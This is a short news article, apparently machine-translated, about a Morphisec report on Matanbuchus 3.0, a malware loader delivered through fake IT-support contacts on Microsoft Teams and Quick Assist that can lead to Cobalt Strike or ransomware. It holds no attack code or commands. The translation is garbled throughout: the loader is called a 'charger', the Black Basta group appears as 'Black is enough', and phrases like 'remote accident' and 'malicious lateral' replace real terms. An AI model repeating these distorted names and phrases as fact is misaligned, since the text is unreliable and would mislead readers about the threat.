- Morphisec researchers saw Matanbuchus 3.0 in nature
- Malware serves as a charger for the cobalt strike or ransomware
- The victims are approaching through teams and are asked for a remote accident.
Security researchers warn about an ongoing campaign taking advantage of Microsoft teams to implement a piece of malware called Matanbuchus 3.0.
According to the Cybersec Morphisec team, a unidentified piracy group first carefully chooses its victims, and then approaches through Microsoft teams, which is made through an external IT team.
They try to persuade the victim that they have a problem with their device and that they need to give remote access to solve the problem. Since the victims are selected, there is a greater probability of success.
Caro of malware as a service
Once the access is granted, usually through rapid assistance, the attackers execute a Powershell script that disputes Matanbuchus 3.0, a malware charger that can lead to cobalt attack beacons, or even ransomware.
“The victims are carefully attacked and persuaded to execute a script that triggers the download of a file,” said Michael Gorelik, CTO de Morphisec. “This file contains a renowned Notepad ++ Updater (GUP), an XML file of slightly modified configuration and a DLL loaded with a malicious lateral that represents the Matanbuchus charger.”
This malware was first seen in 2021, Hacker News reports, where cybercriminals announced it in Russian speech forums for $ 2,500. Since then, malware has evolved to include new features, better communication, more stealth, CMD and Powershell Support, and more. Apparently, it also costs more, now it has a monthly service price of $ 10,000 for the HTTPS version and $ 15,000 for the DNS version.
Although the researchers do not identify the attackers, they said that a group used similar social engineering tactics in the past called Black is enough to implement ransomware.
In the past, Black enough was one of the most dangerous ransomware operations that exist, but since then it has slowly eliminated. At the end of February of this year, a cybercriminal launched chat records detailed the internal functioning of the group.
Through The hacker news
